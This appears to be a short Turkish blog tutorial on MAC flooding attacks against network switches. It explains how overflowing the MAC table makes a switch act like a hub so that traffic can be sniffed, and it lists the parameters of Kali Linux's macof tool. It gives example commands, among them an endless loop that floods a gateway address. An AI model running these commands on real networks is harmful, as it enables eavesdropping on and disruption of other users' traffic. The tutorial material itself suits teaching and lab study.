Her ethernet anahtarın(Switch) belli sayıda MAC adresini muhafaza ettiği bir MAC tablosu bulunur. MAC Tablosu hangi MAC adresine hangi porttan çıkış yapılacağını belirler. Eğer switch'e bu tabloda bulunmayan bir MAC adresini hedef alan bir paket gelirse, switch bu paketi bütün portlarından gönderir. Bu olaya Bilinmeyen Unicast Taşması (Unknown Unicast Flooding) denir. MAC Flood saldırısı, bu durumu ortaya çıkarıp switch'in saldırganın istediği şekilde davranmasını sağlamaya çalışır. Bu durumun ortaya çıkması için saldırgan switch'in MAC tablosunu doldurmak için, kendi MAC adresini değiştirerek ard arda paketler gönderir. Bilinmeyen Unicast Taşması oluştuğunda, tabloda olmayan MAC adreslerini hedef alan paketler bütün portlardan yayınlanacağı için hedef bilgisayarın trafiği elde edilebilir, bu sırada hedef bilgisayar ağdaki diğer bilgisayarlar ile haberleşmeye devam eder.
Kısaca
Macof rastgele mac adresleriyle birlikte switche yapılan saldırıdır.
Bu mac adresleriyle switch in MAC tablosu dolar ve yeni mac adresleri kaydedilemez.
Bunun sonucunda switch hub gibi davranmaya başlar ve bütün paketleri bütün portlara göndermeye başlar.
Bizde geçen bütün trafiği izleyebiliriz.
Kali Linux standart kurulu bir araçtır. Terminal ekranından çalışır.
Kullanımı:
macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-i interface] [-n times]
Paremetreleri:
- -i interface arayüz seçimi.
- -s src Kaynak IP adresi.
- -d dst Hedef IP adresi.
- -e tha Hedef Donanım adresi.
- -x sport TCP kaynak portu.
- -y dport TCP hedef bağlantı portu.
- -n times Gönderilecek paket sayısı.
macof -h: yardım
macof -i eth0 -n 10 :standart kullanım eth0 arabiriminde 10 paket oluşturma
macof -i eth0 -n 10 -d 192.168.220.140 : hedef ip belirterek
while [ 1 ] ; do macof -d 192.168.1.1 -n 100000 ; sleep 50 ; done :MAC sel saldırısı
etherape aracı çalıştırılarak izlenebilir.
Hiç yorum yok :
Yorum Gönder